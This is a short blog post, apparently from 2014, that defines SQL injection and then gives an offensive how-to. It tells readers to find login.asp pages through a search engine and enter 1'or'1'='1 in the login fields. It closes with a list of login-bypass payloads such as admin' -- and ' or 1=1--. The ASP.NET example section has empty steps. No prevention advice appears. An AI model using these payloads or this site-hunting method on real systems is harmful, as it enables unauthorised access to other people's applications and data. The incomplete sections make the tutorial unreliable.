Saturday 15 March 2014

SQL injection with example explained

What is SQL Injection?

SQL injection is a web application security vulnerability in which an attacker submits SQL that the web application then executes, exposing the back-end database. It can occur when a web application uses user-supplied data as part of a command or query without proper validation or encoding. The specially crafted input tricks the application into executing unintended commands or changing data. SQL injection allows an attacker to create, read, update, alter, or delete data stored in the back-end database.
SQL injection is a code injection technique used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution.

SQL injection example
Step 1
Find a login.asp page in a search engine
Step 2
username:    1'or'1'='1
password:    1'or'1'='1




 
SQL injection example in ASP.NET
Step 1:

Step 2:


Bypassing Login Screens
SQL Injection Login tricks
    admin' --
    admin' #
    admin'/*
    ' or 1=1--
    ' or 1=1#
    ' or 1=1/*
    ') or '1'='1--
    ') or ('1'='1--
